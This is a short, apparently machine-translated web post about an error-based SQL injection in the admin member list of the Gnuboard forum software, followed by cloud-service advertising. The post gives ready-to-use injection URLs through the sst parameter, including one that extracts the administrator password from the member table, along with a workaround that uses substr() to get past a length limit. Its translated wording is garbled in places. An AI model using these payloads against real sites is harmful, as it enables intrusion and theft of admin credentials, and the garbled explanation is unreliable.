Kr is a popular bbs. Only Smecta injection in the background ~ This injection belongs to the injection after order. It can be executed by order by a (select statement. In this case, the select statement in parentheses is only used as a subquery. When the statement syntax is correct, the normal page is returned and data cannot be obtained. In this case, we can use mysql error injection to obtain data. For example, http: // 127.0.0.1/gnuboard/adm/member_list.php? Sst = mb_intercept_date, (select + 1 + from + (select + count (*), concat (select version (), floor (rand (0) * 2 )) x + from + information_schema.tables + group + by + x) a)> 0) obtain the administrator password: http: // 127.0.0.1/gnuboard/adm/member_list.php? Sst = mb_intercept_date, (select + 1 + from + (select + count (*), concat (select mb_password from g4_member limit 0, 1), floor (rand (0) * 2) x + from + information_schema.tables + group + by + x) a)> 0) when the preceding statement is executed, the error message is: 1242: Subquery returns more than 1 row.
Cause:
By default, the read length of this statement is 65 bits, while that of mb_password is varchar, And the read length is 255. In this case, we use the substr () function to limit the read length. That is, substr (mb_password, 1, 55) can get the management password.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
